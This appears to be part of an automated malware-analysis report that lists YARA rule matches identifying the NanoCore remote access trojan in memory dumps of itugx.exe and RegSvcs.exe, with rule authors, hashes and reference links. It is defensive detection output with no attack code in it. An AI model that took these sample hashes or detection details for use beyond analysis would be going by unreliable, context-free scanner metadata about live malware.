Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000001.00000003.359286205.00000000036B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
